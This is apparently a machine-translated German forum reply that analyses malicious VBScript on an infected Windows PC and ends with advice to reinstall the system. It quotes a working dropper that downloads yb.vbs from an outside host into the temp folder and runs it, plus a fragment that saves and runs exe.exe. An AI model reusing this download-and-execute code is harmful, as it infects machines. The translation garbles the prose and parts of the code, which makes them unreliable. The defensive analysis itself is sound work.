Ich bin nicht bereit, bis zu dem Öffnen der Web site, die Sie jedoch, erwähnten von den Indexen oben, zu gehen bin hier, was ich sehe…
Index 1 verursacht eine unbelegte Akte, Verbindungen zu einer Web site und zu den Downloads der Inhalt der Seite und Dumps es in die unbelegte Akte. Diese Akte gespeichert als „yb.vbs“ und soll durchführen.
-------------------------------------------------------------------
B= " yb.vbs "
Mit CreateObject („MSXML2.XMLHTTP
“)
.open „ERHALTEN“, „
http://jyiop.com/kr/yb.vbs“, falsch
.send ()
Einstellen A = CreateObject („Scripting.FileSystemObject
“)
Einstellen D = A.CreateTextFile (A.GetSpecialFolder
(
2) + „\“ + B)
D.WriteLine .responseText
Ende mit
D.Close
CreateObject („WScript.Shell
“). A.GetSpecialFolder laufen lassen (2) +“ \ „+ B
-------------------------------------------------------------------
Schritt 2, nun da die vbs Akte und Durchlauf hergestellt worden, versucht es, eine andere Webseite zu besuchen, aber dieses mal speichert den Webseiteninhalt in eine Akte, die „exe.exe“ genannt. Diese neue Akte soll in das Benutzer Tempfaltblatt gespeichert werden.
Der Index laufen lässt dann die Akte „exe.exe“.
Wie Sie erwähnten, stoppt taskkill Windows Media Player - warum, das?!? weiß!
Der Index löscht dann den vb Index, den Schritt 1 verursachte (der Index, der z.Z. läuft).
Es gibt eine zweite Wartezeit 3, dann, welches die Akte „exe.exe“ gelöscht.
Dieses Teil;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Wenn c.Status = x dann
u=c.ResponseBody: d.Open: d.Type
= y: d.Write u: d.SaveToFile b: d.Close]
ist der Index, der schreibt, um eine Akte zu öffnen, die in der Webseite - nichts, mit Adobe zu tun strömt. „c.Status“ - der Index wartet, dass die Webseite bereit und gepasst ist herunterzuladen. „u=c.ResponseBody“ nimmt die Webseite und schiebt sie in eine Variable. Der Strom geöffnet und der Text herunterladen in die Variable rladen. Die Akte gespeichert und geschlossen. In diesem Index gespeichert die Webseite/die Akte in das Tempfaltblatt als „exe.exe“.
Die reale Gefahr ist dass „exe.exe“ Akte. Sobald sie laufen gelassen worden, gibt es kein Erklären, was es entworfen, um zu tun.
Dieser Computer angesteckt noch mit einem Virus. Das Programm „exe.exe“ könnte andere Viren im Hintergrund herunterladen haben, um Scans des Systems zu behindern. Die Tatsache, dass Sie das geöffnete Befehlsfenster sehen können und der Index versucht, um zu laufen erklärt mir, dass es irgendeine böswillige noch zurückbleibende Akte gibt.
Es kann Zeit sein, auszuwerten, welche Notwendigkeiten, von dieser Maschine gespeichert zu werden und mit einer Wiedereinsetzung von Windows und von Anwendungen wieder beginnen. Es klingt drastisch, aber sehend, während das Antivirus nichts aus Art heraus ich ermittelt, denken, dass Sie im Augenblick keiner Rückkehr sind. An das, solange der böswillige Code dort eingeschaltet ist, irgendein erinnern fahren; sei es USB-Gedächtnisstock, Kamera etc., kann das Virus/das Trojan möglicherweise enthalten, wenn es zur Maschine angebracht.
